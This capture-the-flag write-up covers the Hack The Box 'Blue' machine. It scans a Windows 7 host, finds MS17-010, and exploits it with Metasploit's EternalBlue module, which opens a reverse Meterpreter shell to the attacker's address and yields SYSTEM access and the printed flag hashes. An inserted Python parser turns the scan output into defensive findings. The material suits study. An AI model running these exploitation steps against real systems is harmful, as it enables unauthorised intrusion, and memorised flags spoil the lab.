SMB is exposed
# nmap -A -n -F -T5 blue.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-11 11:42 UTC
Nmap scan report for blue.htb (10.10.10.40)
Host is up (0.049s latency).
Not shown: 91 filtered ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: print server|printer|general purpose
Running (JUST GUESSING): HP embedded (89%), FreeBSD 8.X|6.X|7.X (88%), Apple Mac OS X 10.6.X|10.7.X (88%), IBM AIX 4.X (85%)
OS CPE: cpe:/h:hp:jetdirect_170x cpe:/h:hp:inkjet_3000 cpe:/o:freebsd:freebsd:8.0 cpe:/o:apple:mac_os_x:10.6.2 cpe:/o:apple:mac_os_x:10.7.4 cpe:/o:freebsd:freebsd:6.2 cpe:/o:freebsd:freebsd:7.0 cpe:/o:ibm:aix:4.3
Aggressive OS guesses: HP 170X print server or Inkjet 3000 printer (89%), FreeBSD 8.0-CURRENT (88%), Apple Mac OS X 10.6.2 (Snow Leopard) (Darwin 10.2.0) (88%), Apple Mac OS X 10.7.4 (Lion) (Darwin 11.4.0) (87%), FreeBSD 6.2-RELEASE-p2 (pf with scrub enabled) (86%), HP LaserJet 4250 printer (86%), FreeBSD 7.0-RELEASE (85%), IBM AIX 4.3 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -14m30s, deviation: 34m37s, median: 5m27s
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-08-11T12:49:11+01:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-08-11T11:49:10
|_  start_date: 2020-08-10T16:25:02
Looking for SMB vulnerabilities
# nmap --script vuln -p 445 10.10.10.40
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-11 13:58 UTC
Nmap scan report for 10.10.10.40
Host is up (0.028s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 40.22 seconds
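The two scans above together give a defender everything needed to triage this host: SMBv1 signing disabled, SMB2 signing not required, and an unpatched MS17-010. As an added example (not part of the original writeup), here is a small Python parser that reads Nmap's host-script output and turns those lines into findings; the sample text is constructed from the scan lines on this page.

```python
import re

# Constructed sample: NSE host-script lines taken from the scans above.
SAMPLE_NMAP = """\
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
"""


def parse_nse_scripts(text):
    """Return {script_name: [body lines]} from Nmap's '|'-prefixed NSE output."""
    scripts, current = {}, None
    for line in text.splitlines():
        # A script header is a lowercase name followed by ':' and nothing else.
        m = re.match(r"^\|_?\s*([a-z0-9-]+):\s*$", line)
        if m:
            current = m.group(1)
            scripts[current] = []
            continue
        if current and line.startswith("|"):
            scripts[current].append(line.lstrip("|_ ").strip())
    return scripts


def smb_findings(text):
    """Derive defender-relevant findings (risk + fix) from the parsed scripts."""
    s = parse_nse_scripts(text)
    findings = []
    for line in s.get("smb-security-mode", []):
        if line.startswith("message_signing:") and "disabled" in line:
            findings.append("SMB1 message signing disabled: relay/tampering risk; require signing")
    for line in s.get("smb2-security-mode", []):
        if "not required" in line:
            findings.append("SMB2 signing not required: relay/tampering risk; require signing")
    ms17 = s.get("smb-vuln-ms17-010", [])
    if any(l.startswith("State:") and "VULNERABLE" in l for l in ms17):
        cves = [w.split(":", 1)[1] for l in ms17 if l.startswith("IDs:")
                for w in l.split() if w.startswith("CVE:")]
        findings.append("MS17-010 unpatched (%s): apply MS17-010, disable SMBv1" % ", ".join(cves))
    return findings
```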
Attacking with ms17-010 as the entry point
# msfconsole
msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index, for example use 5 or use exploit/windows/smb/smb_doublepulsar_rce

msf5 exploit(windows/smb/smb_doublepulsar_rce) > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS blue.htb
RHOSTS => blue.htb
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.13
LHOST => 10.10.14.13
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[-] Handler failed to bind to 10.10.14.13:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 172.17.0.1
[*] Meterpreter session 1 opened (172.17.0.2:4444 -> 172.17.0.1:36008) at 2020-08-11 14:10:01 +0000
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 2780 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\Windows\system32>cd C:\Users
cd C:\Users

C:\Users>type haris\Desktop\user.txt
type haris\Desktop\user.txt
4c546aea7dbee75cbd71de245c8deea9

C:\Users>type administrator\Desktop\root.txt
type administrator\Desktop\root.txt
ff548eb71e920ff6c08843ce9df4e717